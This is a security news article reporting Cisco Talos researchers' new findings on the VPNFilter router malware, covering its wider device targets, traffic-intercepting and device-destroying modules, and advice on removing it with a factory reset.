New Abilities, Targets of VPNFilter Malware Disclosed
Researchers warned Wednesday that VPNFilter, the strain of potentially destructive malware uncovered last week, can infect more devices than previously thought. It also has the ability to intercept network traffic and deliver malicious payloads via a man-in-the-middle attack.
VPNFilter, the malware that was found running rampant on 500,000 hacked routers across 54 countries last month, can infect more devices than initially thought.
Researchers with Cisco's Talos divulged new details around the malware on Wednesday, including the fact that VPNFilter can also infect devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. The researchers previously disclosed the malware was targeting routers by Linksys, Mikrotik, Netgear, TP-Link, along with network attached storage devices made by QNAP.
The malware can also allow an attacker to deliver exploits to endpoints via a man-in-the-middle attack. By injecting malicious content into web traffic an attacker could infect more than just an vulnerable device but the entire network it sits on, Cisco researchers said Wednesday.
The module that carries that out, dubbed "ssler" by researchers, can also strip encryption from HTTPS sessions.
The 2022 Definitive Guide to Data Classification
Perhaps more troubling, another new module, dstr, can render devices inoperable by removing files needed to run.
"The dstr modules are used to render an infected device inoperable by deleting files necessary for normal operation. It deletes all files and folders related to its own operation first before deleting the rest of the files on the system, possibly in an attempt to hide its presence during a forensic analysis," Cisco researchers wrote Wednesday.
Researchers with the firm said last week the malware had a "kill" command that could've been used to essentially brick devices. The new dstr (device destruction) module, which Talos refers to as a stage 3 module, allows any stage 2 module that doesn't have the "kill" command ability, to disable the device.
Cisco said last week the malware had two other modules that had the ability to sniff network traffic and track Modbus TCP/IP packets and communicate with command and control servers via the Tor network.
The FBI and DOJ helped lessen the malware's blow last Wednesday after it seized control of a server connected to its botnet but the threat around the malware hasn’t completely gone away.
Following the disruption the FBI urged users to reboot their routers but that alone is not enough to completely rid devices of VPNFilter. Rebooting will remove stage 2 and 3 modules but stage 1 will persist even after a router is rebooted. Users looking to truly eradicate the malware will need to wipe its custom settings with a factory reset - usually achievable via a button on the back of devices – and change its password.
Talos researchers warn the latest revelations, especially the fact the malware can inject malicious content into web traffic, is concerning.
If an attacker was able to infect a network they could “deploy any desired additional capability into the environment to support their goals, including rootkits, exfiltration capability and destructive malware,” William Largent, a threat researcher with Talos warned.
The Definitive Guide to DLP
- The seven trends that have made DLP hot again
- How to determine the right approach for your organization
- Making the business case to executives
The Definitive Guide to Data Classification
- Why Data Classification is Foundational
- How to Classify Your Data
- Selling Data Classification to the Business